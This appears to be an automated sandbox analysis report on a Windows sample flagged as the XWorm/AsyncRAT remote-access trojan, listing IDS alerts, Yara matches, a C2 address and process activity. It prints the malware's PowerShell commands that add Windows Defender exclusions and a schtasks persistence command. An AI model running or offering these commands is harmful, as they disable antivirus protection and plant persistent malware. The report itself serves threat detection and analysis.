                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49788 -> 45.141.26.134:7000
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.134:7000 -> 192.168.2.8:49788
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49788 -> 45.141.26.134:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.134:7000 -> 192.168.2.8:49788
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.26.134 7000Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 45.141.26.134
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                Source: global trafficTCP traffic: 192.168.2.8:49788 -> 45.141.26.134:7000
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                Source: unknownDNS query: name: ip-api.com
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: powershell.exe, 00000010.00000002.2314732137.000001A6FE9CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: powershell.exe, 00000010.00000002.2316272859.000001A6FEA1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000009.00000002.1922046061.00000291D1ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 0000000E.00000002.2092526125.0000029CC8C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000009.00000002.1920456209.00000291D19F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
                Source: powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                Operating System Destruction

                barindex
                Protects its processes via BreakOnTermination flag
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD317193_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD360C63_2_00007FFB4AD360C6
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD312903_2_00007FFB4AD31290
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD36E723_2_00007FFB4AD36E72
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD3E5B93_2_00007FFB4AD3E5B9
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD35BC93_2_00007FFB4AD35BC9
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD320F13_2_00007FFB4AD320F1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD310A53_2_00007FFB4AD310A5
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FFB4AD1172B5_2_00007FFB4AD1172B
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FFB4AD110385_2_00007FFB4AD11038
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4AD4248D6_2_00007FFB4AD4248D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4AE130E96_2_00007FFB4AE130E9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AD3248D9_2_00007FFB4AD3248D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE030E99_2_00007FFB4AE030E9
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 20_2_00007FFB4AD3171920_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 20_2_00007FFB4AD3103820_2_00007FFB4AD31038
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 20_2_00007FFB4AD320F120_2_00007FFB4AD320F1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FFB4AD1172B23_2_00007FFB4AD1172B
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FFB4AD1103823_2_00007FFB4AD11038
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4AD0171925_2_00007FFB4AD01719
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4AD0103825_2_00007FFB4AD01038
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4AD020F125_2_00007FFB4AD020F1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4AD3171926_2_00007FFB4AD31719
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4AD3103826_2_00007FFB4AD31038
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4AD320F126_2_00007FFB4AD320F1
                Source: file.exe, 00000000.00000000.1655985395.000000000089E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1676789335.000000001B840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameFullOption_2.1Xenos.exe4 vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.0.dr, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.evad.winEXE@28/24@1/2
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeMutant created: \Sessions\1\BaseNamedObjects\RXodfPcgOmzjDIlhm
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\8Yv9IxtuMbRqy6c8f
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\5tjosB4RVZjT5QLU
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
